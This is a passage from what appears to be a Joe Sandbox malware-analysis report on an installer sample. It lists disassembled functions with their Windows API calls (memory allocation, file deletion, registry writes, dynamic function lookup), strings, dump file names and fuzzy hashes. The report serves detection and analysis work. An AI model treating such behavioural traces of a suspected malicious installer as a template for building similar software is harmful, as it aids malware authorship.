                                                                                                                                                                                • Instruction Fuzzy Hash: 80015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61D0DBB4AA058BA5
                                                                                                                                                                                Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                                                                                                                                • MulDiv.KERNEL32(0006BA15,00000064,0006BC19), ref: 00402F74
                                                                                                                                                                                • wsprintfW.USER32 ref: 00402F84
                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                                                                                                                                Strings
                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402F7E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                • Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                                                                                                                                                                • Instruction ID: 448c993359d53400b231c8c55bc41b2c2aaf26e1e6946bd82a433317a94b79bc
                                                                                                                                                                                • Opcode Fuzzy Hash: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
                                                                                                                                                                                • Instruction Fuzzy Hash: 1101FF70640209BBEF209F60DE4AFAA3B79EB04349F008039FA16A51D1DBB999559F58
                                                                                                                                                                                Function 6FDF25B5 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 6FDF121B: GlobalAlloc.KERNEL32(00000040,?,6FDF123B,?,6FDF12DF,00000019,6FDF11BE,-000000A0), ref: 6FDF1225
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6FDF26A3
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF26D8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                                                • Opcode ID: 78771f4687bcf6c58515c67a6c7a59cf35f3819b72e165d5e0afc3f2f339966b
                                                                                                                                                                                • Instruction ID: 118795161c5be7edc4d5b1cdf526f8cc007d6441d74fed5e03eaa5731a9fc6f6
                                                                                                                                                                                • Opcode Fuzzy Hash: 78771f4687bcf6c58515c67a6c7a59cf35f3819b72e165d5e0afc3f2f339966b
                                                                                                                                                                                • Instruction Fuzzy Hash: 6131F231107681EFDB558FA8EE94C6A77B6FF8731A31A8229F140C7250C730B856DB61
                                                                                                                                                                                Function 00402947 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                                                                • Opcode ID: 737b8f8522516fb9cb569b363d46e537343e0b0d97911977c4cfac53617ae32f
                                                                                                                                                                                • Instruction ID: a183675b87451ddc5318bffc5c3e349b28a5858cebf66036b341c16136851789
                                                                                                                                                                                • Opcode Fuzzy Hash: 737b8f8522516fb9cb569b363d46e537343e0b0d97911977c4cfac53617ae32f
                                                                                                                                                                                • Instruction Fuzzy Hash: B521AE71800124BBDF216FA5DE4999F7E79EF04364F10023AF560762E1CB784D419B98
                                                                                                                                                                                Function 6FDF23E0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF2522
                                                                                                                                                                                  • Part of subcall function 6FDF122C: lstrcpynW.KERNEL32(00000000,?,6FDF12DF,00000019,6FDF11BE,-000000A0), ref: 6FDF123C
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 6FDF24A8
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FDF24C3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4216380887-0
                                                                                                                                                                                • Opcode ID: b754974663d95f7da5323c05c84cb8fded3bf491db1c79c1d8865ecfc7105ff5
                                                                                                                                                                                • Instruction ID: 4ef1266357884b484d1917110f368225211e61917a6f5be7f1dcecd1d5922041
                                                                                                                                                                                • Opcode Fuzzy Hash: b754974663d95f7da5323c05c84cb8fded3bf491db1c79c1d8865ecfc7105ff5
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F4102B000A385EFDB94DF78D840E6A73F8FB5631AB02891DE885C62C1D770B542CB61
                                                                                                                                                                                Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                • Opcode ID: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                                                                                                                                                                • Instruction ID: b40b93da7826e3b7615b819c1b58470e7634271ab5df736de73e72df9abaa9c9
                                                                                                                                                                                • Opcode Fuzzy Hash: ba6a1121c828c2feaf6a58cab7d0464e4284a4e4311cb0c6e8eb76a326c22f0a
                                                                                                                                                                                • Instruction Fuzzy Hash: 1521F572904119AFCB05DFA4DE45AEEBBB5EB08304F14403AF945F62A0CB389D51DB99
                                                                                                                                                                                Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                                                                • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3808545654-0
                                                                                                                                                                                • Opcode ID: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                                                                                                                                • Instruction ID: e0f466a359637f901669b8d4edcb0a2768f8d1cf7dbd19b4a84ec7a1be175679
                                                                                                                                                                                • Opcode Fuzzy Hash: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                                                                                                                                • Instruction Fuzzy Hash: 3301D871950651EFEB006BB4AE89BDA3FB0AF15300F10493AF141B71E2C6B90404DB2D
                                                                                                                                                                                Function 6FDF161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FDF2238,?,00000808), ref: 6FDF1635
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FDF2238,?,00000808), ref: 6FDF163C
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FDF2238,?,00000808), ref: 6FDF1650
                                                                                                                                                                                • GetProcAddress.KERNEL32(6FDF2238,00000000), ref: 6FDF1657
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF1660
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1148316912-0
                                                                                                                                                                                • Opcode ID: fd854546572e81d71d70b6380b032d46dca6a6b18e90ff225aaa09903df1e1e5
                                                                                                                                                                                • Instruction ID: ee4e13965ae85754bb26e25bb954ca5065b126b2a8c893a560a6522393abaa7b
                                                                                                                                                                                • Opcode Fuzzy Hash: fd854546572e81d71d70b6380b032d46dca6a6b18e90ff225aaa09903df1e1e5
                                                                                                                                                                                • Instruction Fuzzy Hash: 0FF01C722075387BEA2016AADD4CC9BBE9CEF8B2F6B150211F6289219086615D11E7F1
                                                                                                                                                                                Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                • String ID: !
                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                • Opcode ID: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                                                                                                                                                                • Instruction ID: 189cbaabe8764c773f58747126bd63a1e8498669fac95269da527f62f649557f
                                                                                                                                                                                • Opcode Fuzzy Hash: 5263d4050aa59f0abe26d97075c7a8140079c933cf19c9a6478e3a25c126592f
                                                                                                                                                                                • Instruction Fuzzy Hash: EE21AD7195420AAEEF05AFB4DD4AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                                                                                                                                                                Function 00404BF1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                                                                                                                                                                • wsprintfW.USER32 ref: 00404C9B
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                • Opcode ID: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                                                                                                                                                                • Instruction ID: 3d6b25ca05220dcf043cb3c1ab85a77e0c97cb6522f385c7b59333deb0f41e84
                                                                                                                                                                                • Opcode Fuzzy Hash: 37836083cc55521027f8373fcaefe3c58d3b132896e9bd9a1ff8b63297692a70
                                                                                                                                                                                • Instruction Fuzzy Hash: 4811EB736041283BEB00A5AD9D45EDE3688DBC5334F254637FA26F31D1E978C81182E8
                                                                                                                                                                                Function 00402482 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 004024CD
                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040250D
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
